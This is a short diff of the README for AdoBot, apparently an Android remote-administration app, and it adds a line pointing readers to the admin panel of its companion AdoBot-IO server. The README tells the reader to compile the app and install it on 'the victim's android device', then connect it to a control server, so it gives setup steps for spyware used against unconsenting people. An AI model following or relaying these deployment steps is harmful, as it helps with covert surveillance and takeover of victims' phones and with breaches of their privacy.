adonespitogo/AdoBot/README.md

 Just compile and install the app to the victim's android device.
 Then start the app and set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server.

+Next go to [https://github.com/adonespitogo/AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) and follow the instructions on setting up the admin panel.

 # Management Console Screen Shots

 ## Main GUI